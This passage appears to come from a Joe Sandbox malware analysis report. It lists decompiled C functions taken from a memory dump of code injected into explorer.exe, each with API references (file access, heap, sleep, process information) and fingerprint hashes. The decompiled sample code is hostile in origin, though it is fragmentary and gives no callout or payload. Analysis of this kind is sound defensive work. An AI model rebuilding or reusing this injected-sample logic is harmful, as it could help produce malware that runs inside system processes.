				asm("sbb ecx, ecx");
				return _t5 &  ~_t2;
			}

0x000ca64f
0x000ca652
0x000ca657
0x000ca65b

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,000CA6C9,00000000,00000400,00000000,000CF8B5,000CF8B5,?,000CFA56,00000000), ref: 000CA64F

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: dc10efbfdf4d0596efad4b309aca95c70faf63e936817f64c8de1a56b9c95d3c
Instruction ID: 1068c18890d774138d04a37c6931822a42b8c5c396f3f8334ead4a3a4bc70c88
Opcode Fuzzy Hash: dc10efbfdf4d0596efad4b309aca95c70faf63e936817f64c8de1a56b9c95d3c
Instruction Fuzzy Hash: 73D012B13A0100BEFB2C9B34CD9AF72339CD714701F22025C7A06EA0E1CA69E9048720

Uniqueness

Uniqueness Score: -1.00%

Function 000C8604, Relevance: 1.5, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000C8604(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0xde768, 8, _a4); // executed
				return _t2;
			}

0x000c8612
0x000c8619

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f6f2957317a3188cc199931cfeb9fc39ac0a0652bc30cfb8c835e5094af43c40
Instruction ID: 67f2f94d9d2d1e8656920a461522efd37944946b4c73135d0d1b7f49406c2d62
Opcode Fuzzy Hash: f6f2957317a3188cc199931cfeb9fc39ac0a0652bc30cfb8c835e5094af43c40
Instruction Fuzzy Hash: CFB09235085A08BBFEC12B81ED05E843F69EB04655F008012FA08080708A6664649BA0

Uniqueness

Uniqueness Score: -1.00%

Function 000CB269, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000CB269(WCHAR* __ecx) {

				return 0 | GetFileAttributesW(__ecx) != 0xffffffff;
			}

0x000cb27c

APIs

GetFileAttributesW.KERNELBASE(00000000,000C4E7B), ref: 000CB26F

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 66e348a4375615d6ddbf5efb008cd9aa4b82378b74d2163687bee5487349325c
Instruction ID: e31c5f2542f69ce23b2b76098601bb74ace79624de71742bfcf3cc401eb3d774
Opcode Fuzzy Hash: 66e348a4375615d6ddbf5efb008cd9aa4b82378b74d2163687bee5487349325c
Instruction Fuzzy Hash: E5B092B62210404BCA186B38998484D32909B1C2313220759B033CA0E1D624C8509A10

Uniqueness

Uniqueness Score: -1.00%

Function 000C85EF, Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000C85EF() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0xde768 = _t1;
				return _t1;
			}

0x000c85f8
0x000c85fe
0x000c8603

APIs

HeapCreate.KERNELBASE(00000000,00080000,00000000,000C5FA7), ref: 000C85F8

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 1adbe088cf2c0bd30e5e52d93837b567d357e8130d197641d92511886dae2574
Instruction ID: 97f405ab2dff3ce32c07cefcd6e371dde968c6b9a07cde9570e7adef5d1870a3
Opcode Fuzzy Hash: 1adbe088cf2c0bd30e5e52d93837b567d357e8130d197641d92511886dae2574
Instruction Fuzzy Hash: 3EB01270686700A6F3D03B209C06B003B50A300B06F304007FF045C1D0CBB41004CF34

Uniqueness

Uniqueness Score: -1.00%

Function 000CF9BF, Relevance: 1.4, APIs: 1, Instructions: 119
sleepCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E000CF9BF(void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _t26;
				char _t27;
				intOrPtr _t29;
				void* _t31;
				void* _t36;
				char _t38;
				intOrPtr _t39;
				char _t42;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr* _t63;
				intOrPtr _t66;
				char* _t67;
				intOrPtr _t69;
				char _t78;
				void* _t81;
				void* _t82;

				_t26 =  *0xde654; // 0x14cfd20
				_t27 = E000C8604( *((intOrPtr*)(_t26 + 4))); // executed
				_v12 = _t27;
				if(_t27 != 0) {
					_t63 =  *0xde654; // 0x14cfd20
					if( *((intOrPtr*)(_t63 + 4)) > 0x400) {
						E000C86E1(_t27,  *_t63, 0x400);
						_v8 = 0;
						_t36 = E000C109A(_t63, 0x34a);
						_t66 =  *0xde688; // 0xf0000
						_t72 =  !=  ? 0x67d : 0x615;
						_t38 = E000C95E1(_t66,  !=  ? 0x67d : 0x615);
						_push(0);
						_push(_t36);
						_t67 = "\\";
						_v24 = _t38;
						_push(_t67);
						_push(_t38);
						_t39 =  *0xde688; // 0xf0000
						_push(_t67);
						_v20 = E000C92E5(_t39 + 0x1020);
						_t42 = E000CA6A9( &_v8, _t41,  &_v8); // executed
						_v16 = _t42;
						E000C85D5( &_v24);
						E000C85D5( &_v20);
						_t73 = _v16;
						_t82 = _t81 + 0x3c;
						_t69 = _v8;
						if(_v16 != 0 && _t69 > 0x400) {
							_t51 =  *0xde654; // 0x14cfd20
							_t52 =  *((intOrPtr*)(_t51 + 4));
							_t53 =  <  ? _t69 : _t52;
							_t54 = ( <  ? _t69 : _t52) + 0xfffffc00;
							E000C86E1(_v12 + 0x400, _t73 + 0x400, ( <  ? _t69 : _t52) + 0xfffffc00);
							_t69 = _v8;
							_t82 = _t82 + 0xc;
						}
						E000C861A( &_v16, _t69);
						E000C861A( &_v20, 0xfffffffe);
						_t27 = _v12;
						_t81 = _t82 + 0x10;
						_t63 =  *0xde654; // 0x14cfd20
					}
					_t78 = 0;
					while(1) {
						_t29 =  *0xde688; // 0xf0000
						_t31 = E000CA77D(_t29 + 0x228, _t27,  *((intOrPtr*)(_t63 + 4))); // executed
						_t81 = _t81 + 0xc;
						if(_t31 >= 0) {
							break;
						}
						Sleep(1);
						_t78 = _t78 + 1;
						if(_t78 < 0x2710) {
							_t27 = _v12;
							_t63 =  *0xde654; // 0x14cfd20
							continue;
						}
						break;
					}
					E000C861A( &_v12, 0);
				}
				return 0;
			}

0x000cf9c5
0x000cf9cd
0x000cf9d2
0x000cf9d8
0x000cf9de
0x000cf9f1
0x000cf9fb
0x000cfa05
0x000cfa08
0x000cfa0d
0x000cfa23
0x000cfa27
0x000cfa2c
0x000cfa2d
0x000cfa2e
0x000cfa33
0x000cfa36
0x000cfa37
0x000cfa38
0x000cfa3d
0x000cfa4c
0x000cfa51
0x000cfa56
0x000cfa5d
0x000cfa66
0x000cfa6b
0x000cfa6e
0x000cfa71
0x000cfa76
0x000cfa7c
0x000cfa81
0x000cfa86
0x000cfa89
0x000cfa9c
0x000cfaa1
0x000cfaa4
0x000cfaa4
0x000cfaac
0x000cfab7
0x000cfabc
0x000cfabf
0x000cfac2
0x000cfac2
0x000cfac8
0x000cfaca
0x000cface
0x000cfad9
0x000cfade
0x000cfae3
0x00000000
0x00000000
0x000cfaec
0x000cfaf2
0x000cfaf9
0x000cfafb
0x000cfafe
0x00000000
0x000cfafe
0x00000000
0x000cfaf9
0x000cfb0b
0x000cfb14
0x000cfb18

APIs

Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612

Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,000CF8B5,?,?,?,000CFCB9,00000000), ref: 000CFAEC

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeapSleep
String ID:
API String ID: 4201116106-0
Opcode ID: abf1f574cf568c11f3fe9f5b8eb334b7d627a063f95a5a36b2a35ba8cde40ca9
Instruction ID: 0cbca30703809a2c9c0d4c860327d646f2255841ca950a665f446f2c8c25f923
Opcode Fuzzy Hash: abf1f574cf568c11f3fe9f5b8eb334b7d627a063f95a5a36b2a35ba8cde40ca9
Instruction Fuzzy Hash: F0417FB2A00105ABEB04EBA4CD85FAEB7BDEB54304B14407EF905DB242DB39DA05CB65

Uniqueness

Uniqueness Score: -1.00%

Function 000C896F, Relevance: 1.4, APIs: 1, Instructions: 107
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E000C896F(WCHAR* __ecx, short __edx, intOrPtr _a4, short _a8) {
				char _v8;
				WCHAR* _v12;
				signed int _v16;
				WCHAR* _v20;
				short _t30;
				short _t33;
				intOrPtr _t38;
				intOrPtr _t43;
				intOrPtr _t45;
				short _t49;
				void* _t52;
				char _t71;
				WCHAR* _t72;

				_v16 = _v16 & 0x00000000;
				_t71 = 0;
				_v12 = __ecx;
				_t49 = __edx;
				_v8 = 0;
				_t72 = E000C8604(0x448);
				_v20 = _t72;
				_pop(_t52);
				if(_t72 != 0) {
					_t72[0x21a] = __edx;
					_t72[0x21c] = _a8;
					lstrcpynW(_t72, _v12, 0x200);
					if(_t49 != 1) {
						_t30 = E000C8604(0x100000);
						_t72[0x212] = _t30;
						if(_t30 != 0) {
							_t69 = _a4;
							_t72[0x216] = 0x100000;
							if(_a4 != 0) {
								E000C87EA(_t72, _t69);
							}
							L16:
							return _t72;
						}
						L7:
						if(_t71 != 0) {
							E000C861A( &_v8, 0);
						}
						L9:
						_t33 = _t72[0x218];
						if(_t33 != 0) {
							_t38 =  *0xde684; // 0x14cf8f0
							 *((intOrPtr*)(_t38 + 0x30))(_t33);
						}
						_t73 =  &(_t72[0x212]);
						if(_t72[0x212] != 0) {
							E000C861A(_t73, 0);
						}
						E000C861A( &_v20, 0);
						goto L1;
					}
					_t43 = E000CA6A9(_t52, _v12,  &_v16); // executed
					_t71 = _t43;
					_v8 = _t71;
					if(_t71 == 0) {
						goto L9;
					}
					if(E000C8815(_t72, _t71, _v16, _a4) < 0) {
						goto L7;
					} else {
						_t45 =  *0xde684; // 0x14cf8f0
						 *((intOrPtr*)(_t45 + 0x30))(_t72[0x218]);
						_t72[0x218] = _t72[0x218] & 0x00000000;
						E000C861A( &_v8, 0);
						goto L16;
					}
				}
				L1:
				return 0;
			}

0x000c8975
0x000c897c
0x000c897e
0x000c8986
0x000c8988
0x000c8990
0x000c8992
0x000c8995
0x000c8998
0x000c89ac
0x000c89b3
0x000c89b9
0x000c89c2
0x000c8a1a
0x000c8a1f
0x000c8a28
0x000c8a75
0x000c8a78
0x000c8a80
0x000c8a84
0x000c8a84
0x000c8a89
0x00000000
0x000c8a89
0x000c8a2a
0x000c8a2c
0x000c8a34
0x000c8a3a
0x000c8a3b
0x000c8a3b
0x000c8a43
0x000c8a46
0x000c8a4b
0x000c8a4b
0x000c8a4e
0x000c8a57
0x000c8a5c
0x000c8a62
0x000c8a69
0x00000000
0x000c8a6f
0x000c89cb
0x000c89d0
0x000c89d2
0x000c89d9
0x00000000
0x00000000
0x000c89ee
0x00000000
0x000c89f0
0x000c89f0
0x000c89fb
0x000c89fe
0x000c8a0b
0x00000000
0x000c8a11
0x000c89ee
0x000c899a
0x00000000

APIs

Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612

lstrcpynW.KERNEL32(00000000,00000000,00000200,00000000,00000000,00000003), ref: 000C89B9

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeaplstrcpyn
String ID:
API String ID: 680773602-0
Opcode ID: 6233b6b3d4297c436b7d4ea9638664684535f7d866eee7f8ed876d75261b8930
Instruction ID: f7af5643379fb798a10d9983aff7c2aee7eeb5d10f7fdca91578ae01a6c37180
Opcode Fuzzy Hash: 6233b6b3d4297c436b7d4ea9638664684535f7d866eee7f8ed876d75261b8930
Instruction Fuzzy Hash: 96318172A04304EFEB249BA5D845F9EB7E9EF44760F64842EF50597182DF30AA00875D

Uniqueness

Uniqueness Score: -1.00%

Function 000CE2C6, Relevance: 1.3, APIs: 1, Instructions: 92
sleepCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E000CE2C6(void* __fp0, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _v24;
				void* _v28;
				char _v32;
				char _v544;
				signed int _t40;
				intOrPtr _t41;
				intOrPtr _t48;
				intOrPtr _t58;
				void* _t65;
				intOrPtr _t66;
				void* _t70;
				signed int _t73;
				void* _t75;
				void* _t77;

				_t77 = __fp0;
				_v20 = 0;
				_v28 = 0;
				_v24 = 0;
				_t66 =  *0xde6b4; // 0x14cfa98, executed
				_t40 =  *((intOrPtr*)(_t66 + 4))(_t65, 0, 2,  &_v8, 0xffffffff,  &_v20,  &_v28,  &_v24);
				if(_t40 == 0) {
					_t73 = 0;
					if(_v20 <= 0) {
						L9:
						_t41 =  *0xde6b4; // 0x14cfa98
						 *((intOrPtr*)(_t41 + 0xc))(_v8);
						return 0;
					}
					do {
						_v16 = 0;
						_v12 = 0;
						_t48 =  *0xde68c; // 0x14cfab8
						 *((intOrPtr*)(_t48 + 0xc4))(0,  *((intOrPtr*)(_v8 + _t73 * 4)), 0,  &_v16, 0,  &_v12,  &_v32);
						_t70 = E000C8604(_v16 + 1);
						if(_t70 != 0) {
							_v12 = 0x200;
							_push( &_v32);
							_push( &_v12);
							_push( &_v544);
							_push( &_v16);
							_push(_t70);
							_push( *((intOrPtr*)(_v8 + _t73 * 4)));
							_t58 =  *0xde68c; // 0x14cfab8
							_push(0);
							if( *((intOrPtr*)(_t58 + 0xc4))() != 0) {
								E000C4905(_t77,  *((intOrPtr*)(_v8 + _t73 * 4)), _t70, _a4);
								_t75 = _t75 + 0xc;
								Sleep(0xa);
							}
						}
						_t73 = _t73 + 1;
					} while (_t73 < _v20);
					goto L9;
				}
				return _t40 | 0xffffffff;
			}

0x000ce2c6
0x000ce2d9
0x000ce2e0
0x000ce2e9
0x000ce2f1
0x000ce2f7
0x000ce2fc
0x000ce307
0x000ce30c
0x000ce3a5
0x000ce3a5
0x000ce3ad
0x00000000
0x000ce3b2
0x000ce313
0x000ce316
0x000ce31d
0x000ce32d
0x000ce333
0x000ce343
0x000ce348
0x000ce34d
0x000ce354
0x000ce358
0x000ce35f
0x000ce363
0x000ce367
0x000ce368
0x000ce36b
0x000ce370
0x000ce379
0x000ce385
0x000ce38f
0x000ce394
0x000ce394
0x000ce379
0x000ce39a
0x000ce39b
0x00000000
0x000ce3a4
0x00000000

APIs

Sleep.KERNELBASE(0000000A), ref: 000CE394

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 3c536258f97a264e063477df406c0674c7dd0b9c6861bbef04606a2caf0c6c18
Instruction ID: d27438c55f7a9eb286fce9ed97ab300969749f514a42abca27bfc32afb8dea28
Opcode Fuzzy Hash: 3c536258f97a264e063477df406c0674c7dd0b9c6861bbef04606a2caf0c6c18
Instruction Fuzzy Hash: 1A310DB5900158AFDB11DF94CD88EEFBBBCEB08350F1142AAB911E7291D730AE018B61

Uniqueness

Uniqueness Score: -1.00%

Function 000CA3ED, Relevance: 1.3, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000CA3ED(signed int __ecx, intOrPtr* __edx, void* __fp0) {
				intOrPtr _v8;
				signed int _v16;
				char _v20;
				void* _t24;
				char _t25;
				signed int _t30;
				intOrPtr* _t45;
				signed int _t46;
				void* _t47;
				void* _t54;

				_t54 = __fp0;
				_t45 = __edx;
				_t46 = 0;
				_t30 = __ecx;
				if( *__edx > 0) {
					do {
						_t24 = E000C9ED0(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8))); // executed
						if(_t24 == 0) {
							_t25 = E000C9749( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8)));
							_v8 = _t25;
							if(_t25 != 0) {
								L6:
								_v16 = _v16 & 0x00000000;
								_v20 = _t25;
								E000CA0AB(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8)), _t54,  &_v20, 8, 2); // executed
								_t47 = _t47 + 0xc;
							} else {
								if(GetLastError() != 0xd) {
									_t25 = _v8;
									goto L6;
								} else {
									E000C9F48( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8))); // executed
								}
							}
						}
						_t46 = _t46 + 1;
					} while (_t46 <  *_t45);
				}
				return 0;
			}

0x000ca3ed
0x000ca3f6
0x000ca3f8
0x000ca3fa
0x000ca3fe
0x000ca400
0x000ca408
0x000ca40f
0x000ca418
0x000ca41d
0x000ca422
0x000ca446
0x000ca44b
0x000ca451
0x000ca45d
0x000ca462
0x000ca424
0x000ca42d
0x000ca443
0x00000000
0x000ca42f
0x000ca43b
0x000ca440
0x000ca42d
0x000ca422
0x000ca465
0x000ca466
0x000ca400
0x000ca470

APIs

Part of subcall function 000C9749: SetLastError.KERNEL32(0000000D,00000000,00000000,000CA341,00000000,00000000,?,?,?,000C5AE1), ref: 000C9782

GetLastError.KERNEL32(00000000,?,00000000,?,?,?,?,000C4C60,?,?,00000000), ref: 000CA424

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: b57cf1d61cdb095835d73ad5a8e6bc193129740f7953490e1dc8bc682e72e34b
Instruction ID: d7e6118cc00964f766b737b52ca09863481d2aae4fe2f29f29cc8711e36414d7
Opcode Fuzzy Hash: b57cf1d61cdb095835d73ad5a8e6bc193129740f7953490e1dc8bc682e72e34b
Instruction Fuzzy Hash: 71116175B0010AABCB14DF59C489F9EF3AAFB85719F20816DD80197242DB70ED05CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 000C5D7D, Relevance: 1.3, APIs: 1, Instructions: 49
stringCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E000C5D7D(void* __eflags) {
				char _v44;
				intOrPtr _t7;
				intOrPtr _t10;
				void* _t11;
				WCHAR* _t12;
				WCHAR* _t13;
				WCHAR* _t14;
				intOrPtr _t15;
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t27;
				WCHAR* _t28;

				_t7 =  *0xde688; // 0xf0000
				E000CA86D( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
				_t10 =  *0xde684; // 0x14cf8f0
				_t28 = 2;
				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
				if(_t11 == 0) {
					_t22 =  *0xde688; // 0xf0000
					_t12 = E000C5974( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
					 *0xde6ac = _t12;
					__eflags = _t12;
					if(_t12 != 0) {
						_t14 = E000C9EBB();
						__eflags = _t14;
						if(_t14 == 0) {
							_t28 = 0;
							__eflags = 0;
						} else {
							_t15 =  *0xde688; // 0xf0000
							lstrcmpiW(_t15 + 0x228, _t14);
							asm("sbb esi, esi");
							_t28 = _t28 + 1;
						}
					}
					_t13 = _t28;
				} else {
					_t19 =  *0xde684; // 0x14cf8f0
					 *((intOrPtr*)(_t19 + 0x30))(_t11);
					_t13 = 3;
				}
				return _t13;
			}

0x000c5d80
0x000c5d95
0x000c5d9e
0x000c5da7
0x000c5da9
0x000c5db1
0x000c5dc1
0x000c5dcf
0x000c5dd4
0x000c5dd9
0x000c5ddb
0x000c5ddd
0x000c5de2
0x000c5de4
0x000c5dff
0x000c5dff
0x000c5de6
0x000c5de7
0x000c5df2
0x000c5dfa
0x000c5dfc
0x000c5dfc
0x000c5de4
0x000c5e01
0x000c5db3
0x000c5db4
0x000c5db9
0x000c5dbe
0x000c5dbe
0x000c5e05

APIs

lstrcmpiW.KERNEL32(000EFDD8,00000000), ref: 000C5DF2

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: b5c5492bde0fcbd79c8d76813e54915602f39492791b3c08382e59e2492a186d
Instruction ID: 103ad920e2b6f5a977f8ee732e07f157b635f09cc7f745bb5b42d842e6e571db
Opcode Fuzzy Hash: b5c5492bde0fcbd79c8d76813e54915602f39492791b3c08382e59e2492a186d
Instruction Fuzzy Hash: 7201B1312026119FF754EBA9DC89F9E33E8DB58341F054029F902DF1E2DA60E840C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 000CBA05, Relevance: 1.3, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000CBA05() {
				signed int _v8;
				signed int _v12;
				intOrPtr _t15;
				void* _t16;
				void* _t18;
				void* _t21;
				intOrPtr _t22;
				void* _t24;
				void* _t30;

				_v8 = _v8 & 0x00000000;
				_t15 =  *0xde68c; // 0x14cfab8
				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
				if(_t16 != 0) {
					_v12 = _v12 & 0x00000000;
					_t18 = E000CB998(1,  &_v12); // executed
					_t30 = _t18;
					if(_t30 != 0) {
						CloseHandle(_v8);
						_t21 = _t30;
					} else {
						if(_v8 != _t18) {
							_t22 =  *0xde684; // 0x14cf8f0
							 *((intOrPtr*)(_t22 + 0x30))(_v8);
						}
						_t21 = 0;
					}
					return _t21;
				} else {
					return _t16;
				}
			}

0x000cba0a
0x000cba12
0x000cba1a
0x000cba1f
0x000cba29
0x000cba32
0x000cba37
0x000cba3c
0x000cba5a
0x000cba5d
0x000cba3e
0x000cba41
0x000cba43
0x000cba4b
0x000cba4b
0x000cba4e
0x000cba4e
0x000cba61
0x000cba22
0x000cba22
0x000cba22

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c71d26ea1c7d67146cd9b950da2090079754ff8c0595719dac4e2876920f872
Instruction ID: 1444dde37cf9ff6e32baa45f932119c6418e42d8efec47e869b3358f31e80b18
Opcode Fuzzy Hash: 6c71d26ea1c7d67146cd9b950da2090079754ff8c0595719dac4e2876920f872
Instruction Fuzzy Hash: A2F06931A10208EFDF60EBA0C986FAE77F8EB04399F1140A9B441EB151DB74DE009B61

Uniqueness

Uniqueness Score: -1.00%

Function 000C5CEC, Relevance: 1.3, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000C5CEC(void* __ecx, void* __eflags, void* __fp0) {
				void _v44;
				signed int _t8;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t21;
				void* _t24;
				void* _t29;
				void* _t35;

				_t35 = __eflags;
				_t24 = __ecx;
				_t8 =  *0xde688; // 0xf0000
				E000D249B(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
				E000C85EF();
				E000C8F78();
				 *0xde780 = 0;
				 *0xde784 = 0;
				 *0xde77c = 0;
				E000C5EB6(); // executed
				E000CCF84(_t24);
				_t14 =  *0xde688; // 0xf0000
				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
				_t15 =  *0xde688; // 0xf0000
				E000CA86D( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7, _t35);
				E000CB337( &_v44);
				memset( &_v44, 0, 0x27);
				E000C5C26( &_v44, __fp0);
				_t21 =  *0xde684; // 0x14cf8f0
				 *((intOrPtr*)(_t21 + 0xdc))(0, _t29);
				return 0;
			}

0x000c5cec
0x000c5cec
0x000c5cef
0x000c5cfe
0x000c5d03
0x000c5d08
0x000c5d0f
0x000c5d15
0x000c5d1b
0x000c5d21
0x000c5d26
0x000c5d2b
0x000c5d33
0x000c5d3d
0x000c5d4b
0x000c5d53
0x000c5d5f
0x000c5d67
0x000c5d6c
0x000c5d72
0x000c5d7c

APIs

Part of subcall function 000C85EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,000C5FA7), ref: 000C85F8

Part of subcall function 000CCF84: GetCurrentProcess.KERNEL32(?,?,000F0000,?,000C3545), ref: 000CCF90
Part of subcall function 000CCF84: GetModuleFileNameW.KERNEL32(00000000,000F1644,00000105,?,?,000F0000,?,000C3545), ref: 000CCFB1
Part of subcall function 000CCF84: memset.MSVCRT ref: 000CCFE2
Part of subcall function 000CCF84: GetVersionExA.KERNEL32(000F0000,000F0000,?,000C3545), ref: 000CCFED
Part of subcall function 000CCF84: GetCurrentProcessId.KERNEL32(?,000C3545), ref: 000CCFF3

Part of subcall function 000CB337: CloseHandle.KERNELBASE(00000000,?,00000000,000C3C8A,?,?,?,?,?,?,?,?,000C3D6F,00000000), ref: 000CB36A

memset.MSVCRT ref: 000C5D5F

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: CurrentProcessmemset$CloseCreateFileHandleHeapModuleNameVersion
String ID:
API String ID: 4245722550-0
Opcode ID: fa89a80829d7a9760737cc4274533f209aa92eb7a2269d63f0a7b72384ce7043
Instruction ID: af213eb193222f81b8a95cd20b2ee53c4ca132bbc1b9434b2fcea704800a8989
Opcode Fuzzy Hash: fa89a80829d7a9760737cc4274533f209aa92eb7a2269d63f0a7b72384ce7043
Instruction Fuzzy Hash: 78011D715022549FF600FBA8DC8AEDD3BE4EF29350F45006AF8049B263DB74A545CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 000C861A, Relevance: 1.3, APIs: 1, Instructions: 33
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000C861A(int _a4, intOrPtr _a8) {
				int _t3;
				intOrPtr _t4;
				void* _t9;

				_t3 = _a4;
				if(_t3 == 0) {
					return _t3;
				}
				_t9 =  *_t3;
				if(_t9 != 0) {
					 *_t3 =  *_t3 & 0x00000000;
					_t4 = _a8;
					if(_t4 != 0xffffffff) {
						if(_t4 == 0xfffffffe) {
							_t4 = E000CC392(_t9);
						}
					} else {
						_t4 = E000CC379(_t9);
					}
					E000C874F(_t9, 0, _t4);
					_t3 = HeapFree( *0xde768, 0, _t9); // executed
				}
				return _t3;
			}

0x000c861d
0x000c8622
0x000c8668
0x000c8668
0x000c8625
0x000c8629
0x000c862b
0x000c862e
0x000c8634
0x000c8642
0x000c8646
0x000c8646
0x000c8636
0x000c8637
0x000c863c
0x000c864f
0x000c8660
0x000c8660
0x00000000

APIs

HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 29d119adc27ebfcbbca3d09bb5a218d10cee232c1cd15d8c43ca6c796faa6935
Instruction ID: bdf107fd91a53e23c3bc046cb1b94fcf4e343da30d7e73e1e878ef7509521b23
Opcode Fuzzy Hash: 29d119adc27ebfcbbca3d09bb5a218d10cee232c1cd15d8c43ca6c796faa6935
Instruction Fuzzy Hash: 94F0A031502624AFEA616B24EC01FAE37889F02B30F24C209F818AA1E1DF309D0087ED

Uniqueness

Uniqueness Score: -1.00%

Function 000CA77D, Relevance: 1.3, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000CA77D(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				void* _t6;
				void* _t10;
				long _t15;
				void* _t17;

				_t15 = 2;
				_t5 = E000CA5F7(_a4, _t15);
				_t17 = _t5;
				if(_t17 != 0) {
					_t6 = E000CA65C(_t17, _a8, _a12); // executed
					if(_t6 != 0) {
						CloseHandle(_t17);
						return 0;
					}
					_t10 = 0xfffffffe;
					return _t10;
				}
				return _t5 | 0xffffffff;
			}

0x000ca786
0x000ca787
